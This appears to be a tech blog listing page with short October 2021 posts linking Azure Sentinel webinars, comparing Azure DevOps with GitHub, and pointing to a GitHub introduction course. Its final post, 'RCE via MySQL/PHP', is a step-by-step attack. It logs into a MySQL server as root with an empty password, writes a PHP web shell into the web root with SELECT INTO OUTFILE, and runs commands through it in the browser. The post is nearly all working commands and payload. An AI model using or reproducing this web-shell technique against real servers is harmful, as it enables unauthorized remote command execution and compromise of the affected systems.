Oct 12, 2021

Cloud & On-Premises architecture

Tags: , ,

 

Azure Sentinel webinar: Cloud & On-Premises architecture [ 89 min ] 

Links:

  • https://www.youtube.com/watch?v=_mm3GNwPBHU

Oct 11, 2021

Understanding Azure Sentinel features and functionality deep dive

Tags: , ,

Microsoft Azure Sentinel webinar: Post-Ignite. Understanding Azure Sentinel features and functionality deep dive. [ 88 min ]

Links:

  • https://www.youtube.com/watch?v=7An7BB-CcQI

Oct 5, 2021

Comparing Microsoft’s DevOps Tools

Tags: ,

Azure DevOps vs GitHub

Context

Once upon a time, there was a Microsoft product called Team Foundation Server (TFS). The online version of TFS then became Visual Studio Online, which became Visual Studio Team Services, which is now Azure DevOps.

Microsoft bought Github in 2018, which is also a DevOps tool and shares a lot of the same features.

Azure DevOps and Github Comparison

Closed Source vs Open Source Management

  • GitHub: Preferred by the community. Offers both public and private repositories.
  • Azure DevOps: Preferred by the enterprise. Offers both public and private repositories.
  • Which is better? Even Microsoft hosts most of their open-source projects on GitHub.

For the full details, read them at A Cloud Guru.

Links:

  • https://acloudguru.com/blog/engineering/azure-devops-vs-github-comparing-microsofts-devops-twins
  • https://azure.microsoft.com/en-us/services/devops/repos/

Oct 4, 2021

Introduction to GitHub

Tags: ,

If you are looking for a quick and fun introduction to GitHub, you've found it. This class will get you started using GitHub in less than an hour. 

Prerequisites

None. This course is a great introduction for your first day on GitHub.

 

What you'll learn

We'll answer common questions like:

  • What is GitHub?
  • How does one use GitHub?
  • What are issues and pull requests?
  • How do you create a branch and a commit?
  • How do you use GitHub Pages?

And when you're done you'll be able to:

  • Communicate in issues
  • Manage notifications
  • Create branches
  • Make commits
  • Introduce changes with pull requests
  • Deploy a web page to GitHub pages

 

Links:

  • https://lab.github.com/githubtraining/introduction-to-github

Oct 2, 2021

RCE via MySQL/PHP

Tags: , , , ,

This is a simple and effective exploitation at a mis-configured MySQL/PHP server.  


First, use nmap to discover a mis-configured MySQL where root with empty password.

Secondly, connect to the MySQL with mysql client.

$ mysql -u root -h 192.168.1.33

Then create a PHP backdoor with the following SQL command:

MySQL > select 'Hello World' into outfile '/tmp/test' from mysql.user limit 1;

MySQL > select '<?php $output=shell_exec($_GET["cmd"]);echo "<pre>".$output."</pre>"?>' into outfile '/var/www/html/shell.php' from mysql.user limit 1;

Lastly, start exploiting it from the browser:

http://192.168.1.33/shell.php

http://192.168.1.33/shell.php?cmd=id

http://192.168.1.33/shell.php?cmd=ps -eaf


Subscribe to: Posts (Atom)